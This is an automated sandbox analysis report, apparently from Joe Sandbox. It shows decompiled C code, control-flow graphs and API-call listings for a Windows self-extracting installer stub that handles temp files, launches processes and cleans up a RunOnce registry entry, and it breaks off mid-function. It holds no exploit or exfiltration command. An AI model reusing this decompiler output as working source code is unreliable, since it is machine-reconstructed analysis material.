                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                      • String ID:
                                                                      • API String ID: 836923961-0
                                                                      • Opcode ID: fbbb9bfe4f9ea6017be187862019f0f550112288ab13b3797c553681327d7d7c
                                                                      • Instruction ID: dff8db7da71289a94e6bf3d03d9b9a58f50558d3e7ba3d01e4a02de16bcacab9
                                                                      • Opcode Fuzzy Hash: fbbb9bfe4f9ea6017be187862019f0f550112288ab13b3797c553681327d7d7c
                                                                      • Instruction Fuzzy Hash: 8A41E131A46365DFEB3E9F6DE805B6A7BE0FB48724F14412AE95297284CB744880CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 587 11d58c8-11d58d5 588 11d58d8-11d58dd 587->588 588->588 589 11d58df-11d58f1 LocalAlloc 588->589 590 11d5919-11d5959 call 11d1680 call 11d658a CreateFileA LocalFree 589->590 591 11d58f3-11d5901 call 11d44b9 589->591 594 11d5906-11d5910 call 11d6285 590->594 600 11d595b-11d596c CloseHandle GetFileAttributesA 590->600 591->594 601 11d5912-11d5918 594->601 600->594 602 11d596e-11d5970 600->602 602->594 603 11d5972-11d597b 602->603 603->601
                                                                      C-Code - Quality: 95%
                                                                      			E011D58C8(intOrPtr* __ecx) {
                                                                      				void* _v8;
                                                                      				intOrPtr _t6;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				void* _t14;
                                                                      				signed char _t16;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				intOrPtr* _t27;
                                                                      				CHAR* _t33;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t33 = __ecx;
                                                                      				_t27 = __ecx;
                                                                      				_t23 = __ecx + 1;
                                                                      				do {
                                                                      					_t6 =  *_t27;
                                                                      					_t27 = _t27 + 1;
                                                                      				} while (_t6 != 0);
                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                      				if(_t20 != 0) {
                                                                      					E011D1680(_t20, _t36, _t33);
                                                                      					E011D658A(_t20, _t36, "TMP4351$.TMP");
                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                      					_v8 = _t10;
                                                                      					LocalFree(_t20);
                                                                      					_t12 = _v8;
                                                                      					if(_t12 == 0xffffffff) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						CloseHandle(_t12);
                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							 *0x11d9124 = 0;
                                                                      							_t14 = 1;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					L4:
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					_t14 = 0;
                                                                      				}
                                                                      				return _t14;
                                                                      			}













                                                                      0x011d58cd
                                                                      0x011d58d1
                                                                      0x011d58d3
                                                                      0x011d58d5
                                                                      0x011d58d8
                                                                      0x011d58d8
                                                                      0x011d58da
                                                                      0x011d58db
                                                                      0x011d58e1
                                                                      0x011d58ed
                                                                      0x011d58f1
                                                                      0x011d591e
                                                                      0x011d592c
                                                                      0x011d5943
                                                                      0x011d594a
                                                                      0x011d594d
                                                                      0x011d5953
                                                                      0x011d5959
                                                                      0x00000000
                                                                      0x011d595b
                                                                      0x011d595c
                                                                      0x011d5963
                                                                      0x011d596c
                                                                      0x00000000
                                                                      0x011d5972
                                                                      0x011d5974
                                                                      0x011d597a
                                                                      0x011d597a
                                                                      0x011d596c
                                                                      0x011d58f3
                                                                      0x011d5901
                                                                      0x011d5906
                                                                      0x011d590b
                                                                      0x011d5910
                                                                      0x011d5910
                                                                      0x011d5918

                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D58E7
                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5943
                                                                      • LocalFree.KERNEL32(00000000,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D594D
                                                                      • CloseHandle.KERNEL32(00000000,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D595C
                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,011D5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 011D5963
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                      • API String ID: 747627703-2139698323
                                                                      • Opcode ID: b29bf09015162da650024a8bbb003a171a573a468e6d35f5747c86e8e21faf43
                                                                      • Instruction ID: ff503d977ff566a3b1dce735e0bda97f6a7ba04234d175e54bd10df2703483a2
                                                                      • Opcode Fuzzy Hash: b29bf09015162da650024a8bbb003a171a573a468e6d35f5747c86e8e21faf43
                                                                      • Instruction Fuzzy Hash: AD1126716022203BD73C5E7EAC4DA9B7FAADF46274B000629B525D3184DB74984583A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 604 11d52b6-11d52d4 605 11d5317-11d531f 604->605 606 11d52d6 604->606 607 11d5379-11d5381 605->607 608 11d5321-11d5328 605->608 609 11d52d7-11d52e0 606->609 611 11d538c-11d53a0 call 11d6ce0 607->611 612 11d5383-11d5385 607->612 608->607 610 11d532a-11d5331 608->610 613 11d5300-11d5314 LocalFree * 2 609->613 614 11d52e2-11d52e9 609->614 610->607 617 11d5333-11d5351 call 11d1781 610->617 612->611 618 11d5387 call 11d1fe1 612->618 613->609 615 11d5316 613->615 614->613 619 11d52eb-11d52fa SetFileAttributesA DeleteFileA 614->619 615->605 624 11d535e-11d536f SetCurrentDirectoryA call 11d2390 617->624 625 11d5353-11d5359 call 11d65e8 617->625 618->611 619->613 628 11d5374 624->628 625->624 628->607
                                                                      C-Code - Quality: 74%
                                                                      			E011D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t9;
                                                                      				signed int _t11;
                                                                      				void* _t21;
                                                                      				void* _t29;
                                                                      				CHAR** _t31;
                                                                      				void* _t32;
                                                                      				signed int _t33;
                                                                      
                                                                      				_t28 = __edi;
                                                                      				_t22 = __ecx;
                                                                      				_t21 = __ebx;
                                                                      				_t9 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t9 ^ _t33;
                                                                      				_push(__esi);
                                                                      				_t31 =  *0x11d91e0; // 0xec7270
                                                                      				if(_t31 != 0) {
                                                                      					_push(__edi);
                                                                      					do {
                                                                      						_t29 = _t31;
                                                                      						if( *0x11d8a24 == 0 &&  *0x11d9a30 == 0) {
                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                      							DeleteFileA( *_t31); // executed
                                                                      						}
                                                                      						_t31 = _t31[1];
                                                                      						LocalFree( *_t29);
                                                                      						LocalFree(_t29);
                                                                      					} while (_t31 != 0);
                                                                      					_pop(_t28);
                                                                      				}
                                                                      				_t11 =  *0x11d8a20; // 0x0
                                                                      				_pop(_t32);
                                                                      				if(_t11 != 0 &&  *0x11d8a24 == 0 &&  *0x11d9a30 == 0) {
                                                                      					_push(_t22);
                                                                      					E011D1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      					if(( *0x11d9a34 & 0x00000020) != 0) {
                                                                      						E011D65E8( &_v268);
                                                                      					}
                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                      					_t22 =  &_v268;
                                                                      					E011D2390( &_v268);
                                                                      					_t11 =  *0x11d8a20; // 0x0
                                                                      				}
                                                                      				if( *0x11d9a40 != 1 && _t11 != 0) {
                                                                      					_t11 = E011D1FE1(_t22); // executed
                                                                      				}
                                                                      				 *0x11d8a20 =  *0x11d8a20 & 0x00000000;
                                                                      				return E011D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                      			}












                                                                      0x011d52b6
                                                                      0x011d52b6
                                                                      0x011d52b6
                                                                      0x011d52c1
                                                                      0x011d52c8
                                                                      0x011d52cb
                                                                      0x011d52cc
                                                                      0x011d52d4
                                                                      0x011d52d6
                                                                      0x011d52d7
                                                                      0x011d52de
                                                                      0x011d52e0
                                                                      0x011d52f2
                                                                      0x011d52fa
                                                                      0x011d52fa
                                                                      0x011d5302
                                                                      0x011d5305
                                                                      0x011d530c
                                                                      0x011d5312
                                                                      0x011d5316
                                                                      0x011d5316
                                                                      0x011d5317
                                                                      0x011d531c
                                                                      0x011d531f
                                                                      0x011d5333
                                                                      0x011d5345
                                                                      0x011d5351
                                                                      0x011d5359
                                                                      0x011d5359
                                                                      0x011d5363
                                                                      0x011d5369
                                                                      0x011d536f
                                                                      0x011d5374
                                                                      0x011d5374
                                                                      0x011d5381
                                                                      0x011d5387
                                                                      0x011d5387
                                                                      0x011d538f
                                                                      0x011d53a0

                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00EC7270,00000080,?,00000000), ref: 011D52F2
                                                                      • DeleteFileA.KERNELBASE(00EC7270), ref: 011D52FA
                                                                      • LocalFree.KERNEL32(00EC7270,?,00000000), ref: 011D5305
                                                                      • LocalFree.KERNEL32(00EC7270), ref: 011D530C
                                                                      • SetCurrentDirectoryA.KERNELBASE(011D11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D5363
                                                                      Strings
                                                                      • pr, xrefs: 011D52CC
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 011D5334
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$pr
                                                                      • API String ID: 2833751637-931104669
                                                                      • Opcode ID: 1efb539cbbb66bd42b268cc15345c80497be0171dd9631ab1878c3f6926c2003
                                                                      • Instruction ID: e1e00f853e61df4ebc11870a8de968efbe880b37b145baade193ac0751780679
                                                                      • Opcode Fuzzy Hash: 1efb539cbbb66bd42b268cc15345c80497be0171dd9631ab1878c3f6926c2003
                                                                      • Instruction Fuzzy Hash: 2C21C032907229EBDB7DDF28E848B697BB5BB14718F040279E96253188CFB458C4CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 656 11d3fef-11d4010 657 11d410a-11d411a call 11d6ce0 656->657 658 11d4016-11d403b CreateProcessA 656->658 659 11d40c4-11d4101 call 11d6285 GetLastError FormatMessageA call 11d44b9 658->659 660 11d4041-11d406e WaitForSingleObject GetExitCodeProcess 658->660 674 11d4106 659->674 663 11d4091 call 11d411b 660->663 664 11d4070-11d4077 660->664 669 11d4096-11d40b8 CloseHandle * 2 663->669 664->663 668 11d4079-11d407b 664->668 668->663 671 11d407d-11d4089 668->671 672 11d4108 669->672 673 11d40ba-11d40c0 669->673 671->663 675 11d408b 671->675 672->657 673->672 676 11d40c2 673->676 674->672 675->663 676->674
                                                                      C-Code - Quality: 84%
                                                                      			E011D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v524;
                                                                      				long _v528;
                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t20;
                                                                      				void* _t22;
                                                                      				int _t25;
                                                                      				intOrPtr* _t39;
                                                                      				signed int _t44;
                                                                      				void* _t49;
                                                                      				signed int _t50;
                                                                      				intOrPtr _t53;
                                                                      
                                                                      				_t45 = __edx;
                                                                      				_t20 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t20 ^ _t50;
                                                                      				_t39 = __ecx;
                                                                      				_t49 = 1;
                                                                      				_t22 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					L13:
                                                                      					return E011D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                      				}
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                      				if(_t25 == 0) {
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                      					_t45 = 0x4c4;
                                                                      					E011D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                      					L11:
                                                                      					_t49 = 0;
                                                                      					L12:
                                                                      					_t22 = _t49;
                                                                      					goto L13;
                                                                      				}
                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                      				_t44 = _v528;
                                                                      				_t53 =  *0x11d8a28; // 0x0
                                                                      				if(_t53 == 0) {
                                                                      					_t34 =  *0x11d9a2c; // 0x0
                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                      						_t34 = _t44 & 0xff000000;
                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                      							 *0x11d9a2c = _t44;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				E011D411B(_t34, _t44);
                                                                      				CloseHandle(_v544.hThread);
                                                                      				CloseHandle(_v544);
                                                                      				if(( *0x11d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                      					goto L12;
                                                                      				} else {
                                                                      					goto L11;
                                                                      				}
                                                                      			}


















                                                                      0x011d3fef
                                                                      0x011d3ffa
                                                                      0x011d4001
                                                                      0x011d4008
                                                                      0x011d400a
                                                                      0x011d400b
                                                                      0x011d4010
                                                                      0x011d410a
                                                                      0x011d411a
                                                                      0x011d411a
                                                                      0x011d401c
                                                                      0x011d401d
                                                                      0x011d401e
                                                                      0x011d401f
                                                                      0x011d4033
                                                                      0x011d403b
                                                                      0x011d40ca
                                                                      0x011d40e9
                                                                      0x011d40f8
                                                                      0x011d4101
                                                                      0x011d4106
                                                                      0x011d4106
                                                                      0x011d4108
                                                                      0x011d4108
                                                                      0x00000000
                                                                      0x011d4108
                                                                      0x011d4049
                                                                      0x011d405c
                                                                      0x011d4062
                                                                      0x011d4068
                                                                      0x011d406e
                                                                      0x011d4070
                                                                      0x011d4077
                                                                      0x011d407f
                                                                      0x011d4089
                                                                      0x011d408b
                                                                      0x011d408b
                                                                      0x011d4089
                                                                      0x011d4077
                                                                      0x011d4091
                                                                      0x011d409c
                                                                      0x011d40a8
                                                                      0x011d40b8
                                                                      0x00000000
                                                                      0x011d40c2
                                                                      0x00000000
                                                                      0x011d40c2

                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 011D4033
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 011D4049
                                                                      • GetExitCodeProcess.KERNELBASE ref: 011D405C
                                                                      • CloseHandle.KERNEL32(?), ref: 011D409C
                                                                      • CloseHandle.KERNEL32(?), ref: 011D40A8
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 011D40DC
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 011D40E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 3183975587-0
                                                                      • Opcode ID: 7e2d8405ea256f7ab8d01a7fec90e196fb5abd5f78e799148a4771370342d1a5
                                                                      • Instruction ID: 1b3bf1a133fd071dd5da876fb05557c5de262c891b52f7e7cb42392fa377a19b
                                                                      • Opcode Fuzzy Hash: 7e2d8405ea256f7ab8d01a7fec90e196fb5abd5f78e799148a4771370342d1a5
                                                                      • Instruction Fuzzy Hash: 3A31B131642228ABEB389F75EC48FAB777CEB94714F1001A9F515D2995C7305DC5CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D51E5(void* __eflags) {
                                                                      				int _t5;
                                                                      				void* _t6;
                                                                      				void* _t28;
                                                                      
                                                                      				_t1 = E011D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                      				if(_t28 != 0) {
                                                                      					if(E011D468F("UPROMPT", _t28, _t29) != 0) {
                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                      						if(_t5 != 0) {
                                                                      							_t6 = E011D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                      							LocalFree(_t28);
                                                                      							if(_t6 != 6) {
                                                                      								 *0x11d9124 = 0x800704c7;
                                                                      								L10:
                                                                      								return 0;
                                                                      							}
                                                                      							 *0x11d9124 = 0;
                                                                      							L6:
                                                                      							return 1;
                                                                      						}
                                                                      						LocalFree(_t28);
                                                                      						goto L6;
                                                                      					}
                                                                      					E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree(_t28);
                                                                      					 *0x11d9124 = 0x80070714;
                                                                      					goto L10;
                                                                      				}
                                                                      				E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0x11d9124 = E011D6285();
                                                                      				goto L10;
                                                                      			}






                                                                      0x011d51fb
                                                                      0x011d5207
                                                                      0x011d520b
                                                                      0x011d523c
                                                                      0x011d5268
                                                                      0x011d5270
                                                                      0x011d528b
                                                                      0x011d5293
                                                                      0x011d529c
                                                                      0x011d52a6
                                                                      0x011d52b0
                                                                      0x00000000
                                                                      0x011d52b0
                                                                      0x011d529e
                                                                      0x011d5279
                                                                      0x00000000
                                                                      0x011d527b
                                                                      0x011d5273
                                                                      0x00000000
                                                                      0x011d5273
                                                                      0x011d524a
                                                                      0x011d5250
                                                                      0x011d5256
                                                                      0x00000000
                                                                      0x011d5256
                                                                      0x011d5219
                                                                      0x011d5223
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,011D2F4D,?,00000002,00000000), ref: 011D5201
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 011D5250
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$UPROMPT
                                                                      • API String ID: 957408736-2980973527
                                                                      • Opcode ID: 8eed36638429b5efd002af4d9996d67ec54b0ae7576a1bca750336b41e997052
                                                                      • Instruction ID: 5bfb7378b1168aee49426d18510b4ba399ae464852685122392665b4821f8b7c
                                                                      • Opcode Fuzzy Hash: 8eed36638429b5efd002af4d9996d67ec54b0ae7576a1bca750336b41e997052
                                                                      • Instruction Fuzzy Hash: 991104B1203205FBE76DAAB59C89F3B61AEEF89298B00403DF652D6584DB798C404234
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D1FE1(void* __ecx) {
                                                                      				void* _v8;
                                                                      				long _t4;
                                                                      
                                                                      				if( *0x11d8530 != 0) {
                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                      					if(_t4 == 0) {
                                                                      						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                      						return RegCloseKey(_v8);
                                                                      					}
                                                                      				}
                                                                      				return _t4;
                                                                      			}





                                                                      0x011d1fee
                                                                      0x011d2005
                                                                      0x011d200d
                                                                      0x011d2017
                                                                      0x00000000
                                                                      0x011d2020
                                                                      0x011d200d
                                                                      0x011d2029

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,011D538C,?,?,011D538C), ref: 011D2005
                                                                      • RegDeleteValueA.KERNELBASE(011D538C,wextract_cleanup0,?,?,011D538C), ref: 011D2017
                                                                      • RegCloseKey.ADVAPI32(011D538C,?,?,011D538C), ref: 011D2020
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                      • API String ID: 849931509-702805525
                                                                      • Opcode ID: 2028e52592c8a33a04edb2383c80ce4b7d7c6d0a4d855a636b954bd3c2754841
                                                                      • Instruction ID: 2e75d4269fb614e6d41681ec6a6a0f85457f3b2c4b455ab6ea3e8ef2499bc24d
                                                                      • Opcode Fuzzy Hash: 2028e52592c8a33a04edb2383c80ce4b7d7c6d0a4d855a636b954bd3c2754841
                                                                      • Instruction Fuzzy Hash: D0E08630553318BBEB39DF91FC4AF597B2AFF01740F1002A8FA14A1055E7715A90D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D4CD0(char* __edx, long _a4, int _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				long _t32;
                                                                      				signed int _t33;
                                                                      				long _t35;
                                                                      				long _t36;
                                                                      				struct HWND__* _t37;
                                                                      				long _t38;
                                                                      				long _t39;
                                                                      				long _t41;
                                                                      				long _t44;
                                                                      				long _t45;
                                                                      				long _t46;
                                                                      				signed int _t50;
                                                                      				long _t51;
                                                                      				char* _t58;
                                                                      				long _t59;
                                                                      				char* _t63;
                                                                      				long _t64;
                                                                      				CHAR* _t71;
                                                                      				CHAR* _t74;
                                                                      				int _t75;
                                                                      				signed int _t76;
                                                                      
                                                                      				_t69 = __edx;
                                                                      				_t29 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t30 = _t29 ^ _t76;
                                                                      				_v8 = _t30;
                                                                      				_t75 = _a8;
                                                                      				if( *0x11d91d8 == 0) {
                                                                      					_t32 = _a4;
                                                                      					__eflags = _t32;
                                                                      					if(_t32 == 0) {
                                                                      						_t33 = E011D4E99(_t75);
                                                                      						L35:
                                                                      						return E011D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                      					}
                                                                      					_t35 = _t32 - 1;
                                                                      					__eflags = _t35;
                                                                      					if(_t35 == 0) {
                                                                      						L9:
                                                                      						_t33 = 0;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t36 = _t35 - 1;
                                                                      					__eflags = _t36;
                                                                      					if(_t36 == 0) {
                                                                      						_t37 =  *0x11d8584; // 0x0
                                                                      						__eflags = _t37;
                                                                      						if(_t37 != 0) {
                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                      						}
                                                                      						_t54 = 0x11d91e4;
                                                                      						_t58 = 0x11d91e4;
                                                                      						do {
                                                                      							_t38 =  *_t58;
                                                                      							_t58 =  &(_t58[1]);
                                                                      							__eflags = _t38;
                                                                      						} while (_t38 != 0);
                                                                      						_t59 = _t58 - 0x11d91e5;
                                                                      						__eflags = _t59;
                                                                      						_t71 =  *(_t75 + 4);
                                                                      						_t73 =  &(_t71[1]);
                                                                      						do {
                                                                      							_t39 =  *_t71;
                                                                      							_t71 =  &(_t71[1]);
                                                                      							__eflags = _t39;
                                                                      						} while (_t39 != 0);
                                                                      						_t69 = _t71 - _t73;
                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							L3:
